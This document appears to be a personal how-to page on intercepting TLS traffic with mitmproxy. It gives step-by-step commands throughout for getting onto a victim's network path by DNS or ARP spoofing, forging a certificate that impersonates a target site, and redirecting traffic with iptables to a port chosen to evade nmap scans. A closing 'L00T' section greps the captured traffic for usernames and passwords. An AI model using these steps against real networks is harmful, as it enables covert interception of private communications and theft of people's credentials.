SSL MITM WITH MITMPROXY

INTRO

first of all, you need to be on the network path, be it as an existing gateway, by means of dns or arp spoofing, what-so-ever. in any case, making sure you have the appropriate gateway and resolvers yourself so you can relay the traffic. on the client’s side, the right network path shows up but the first hop.

you can run mitmproxy as user on a local and exotic port, as long as you enable the interception.

there are two ways to go for ssl interception

targetted mitm with a specific cert
on-the-fly mitm with a CA

INSTALL

either as package, from scratch or using latest released binaries

as package

#apt install mitmproxy
#dpkg -l | grep mitm

from scratch

apt install python3 python3-venv
#python3-pip

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy/

./dev.sh
. venv/bin/activate
mitmproxy --version

grab the latest release

as root

wget https://snapshots.mitmproxy.org/7.0.4/mitmproxy-7.0.4-linux.tar.gz
mkdir -p mitm/
tar xzf mitmproxy-7.0.4-linux.tar.gz -C mitm/
ls -alF mitm/
chown root:root mitm/*
mv mitm/* /usr/local/bin/
rmdir mitm/

SELF-SIGNED

as user

let’s have a look on what you need to impersonate

echo Q | openssl s_client -servername TARGET-VHOST -connect TARGET-HOST:443 \
    | openssl x509 -noout -text

ideally you get a true cert but this makes a PoC

cd ~/certs/
openssl req -x509 -newkey rsa:2048 -nodes \
    -subj /CN=DOMAIN \
    -keyout DOMAIN.self.key \
    -out DOMAIN.self.crt

mitmproxy wants CRT + KEY concatenated as PEM file

cat DOMAIN.self.crt DOMAIN.self.key > DOMAIN.self.pem
chmod 400 *.crt *.key *pem

SSL MITM

start the mitm service either with a TUI (this truly eats your memory) –or– in tcpdump-alike style (writes to a file)

TEXT / ON-THE-FLY MODE

echo $LANG
#export LANG=en_US.UTF-8

mitmproxy --version
mitmproxy -h | less
mitmproxy --options | less

mitmproxy -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --set console_mouse=false

ls -alF $HOME/.mitmproxy/

TEXT / TARGETTED MODE

now sniffing ONLY example.net and passing through the rest with no tainting. same as above but with

    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
    --certs example.net=example.net.self.pem
    # --ssl-insecure

DUMP / TARGETTED MODE

mitmdump --version
mitmdump -h | less
mitmdump --options | less

don’t ask me why we need an absolute path there

mkdir -p /data/dumps/
date=`date +%s`
export MITMPROXY_SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt"
#SSLKEYLOGFILE=

echo $date
#echo $SSLKEYLOGFILE
echo $MITMPROXY_SSLKEYLOGFILE

mitmdump -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
    --certs example.net=$HOME/certs/example.net.pem \
    -w /data/dumps/$date.mitmdump --flow-detail 0

INTERCEPTION

default port for mitmproxy is 8080 being used for both http or https. we want a port that is not in nmap’s top 1000 to remain hidden.

sysctl -w net.ipv4.ip_forward=1
sysctl net.ipv4.ip_forward

sysctl -w net.ipv4.conf.eth0.send_redirects=0
sysctl net.ipv4.conf.eth0.send_redirects

nic=virbr0
iptables -t nat -A PREROUTING -i $nic -p tcp --dport 443 -j REDIRECT --to-port 33231
iptables -nvL -t nat

ACCEPTANCE

from the victim/client

curl -i https://example.net/
curl -ik https://example.net/

L00T & FINE TUNE

netstat -lntup
cd /data/dumps/
grep -a UserName $date.mitmdump
grep -a Password $date.mitmdump

enhance your filter offline

cd /data/dumps/
mitmdump -nr $date.mitmdump "~m get"
mitmdump -nr $date.mitmdump "~m post"

RESOURCES